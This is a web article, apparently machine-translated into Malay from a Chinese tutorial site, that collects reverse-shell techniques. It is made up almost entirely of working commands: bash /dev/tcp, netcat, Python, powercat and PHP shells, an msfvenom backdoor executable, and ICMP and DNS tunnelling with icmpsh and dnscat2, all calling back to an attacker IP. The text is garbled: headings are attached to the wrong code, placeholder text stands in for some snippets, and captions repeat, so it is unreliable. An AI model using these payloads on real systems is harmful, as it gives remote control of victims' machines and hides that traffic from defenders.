Rumah > Operasi dan penyelenggaraan > Keselamatan > Apakah peluru lantunan semula?

Apakah peluru lantunan semula?

王林
Lepaskan: 2023-05-18 22:01:04
ke hadapan
2235 orang telah melayarinya

1.bash lantun

bash -i >& /dev/tcp/ip_address/port 0>&1
Salin selepas log masuk

Apakah peluru lantunan semula?

2.nc lantun

nc -e /bin/sh 192.168.2.130 4444
Salin selepas log masuk

Apakah peluru lantunan semula?

3.python

rreee

Apakah peluru lantunan semula?

4.powercat

import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
Salin selepas log masuk

Apakah peluru lantunan semula?

5.msf menjana exe backdoor

rreee

6.php rebound shell

Import-Module .\powercat.ps1
powercat -c 192.168.2.130 -p 4444 -e cmd.exe
Salin selepas log masuk

Apakah peluru lantunan semula?

Apakah peluru lantunan semula?

7.ICMP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
Salin selepas log masuk

berjalan dalam windows7:

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
Salin selepas log masuk

Apakah peluru lantunan semula?

Apakah peluru lantunan semula?

8.DNS

https://downloads.skullsecurity.org/dnscat2/

Di sini kami menggunakan dnscat2, berikut adalah muat turunnya, Terbahagi kepada versi windows dan linux, pelayan dan klien.

Dan adalah disyorkan untuk menggunakan vs2008 untuk menyusun

memasang

关闭icmp响应,不然shell一直跳,恢复是0

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py 源 目标
python icmpsh_m.py 192.168.2.137 192.168.2.135
Salin selepas log masuk

kali

icmpsh.exe -t 192.168.2.137
Salin selepas log masuk

windows7:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb
Salin selepas log masuk

Selepas sambungan berjaya

Apakah peluru lantunan semula?

Apakah peluru lantunan semula?

Lihat rekod

Apakah peluru lantunan semula?

Pilih sambungan

Apakah peluru lantunan semula?

Gunakan shell

Apakah peluru lantunan semula?

Kembali ke shell pilih

Apakah peluru lantunan semula?

Laksanakan arahan

Apakah peluru lantunan semula?

Arahan lain

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com
Salin selepas log masuk

pemajuan terowong DNS

./dnscat --dns server=192.168.2.130,port=53531
./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)
./dnscat xxx.com
Salin selepas log masuk

Atas ialah kandungan terperinci Apakah peluru lantunan semula?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan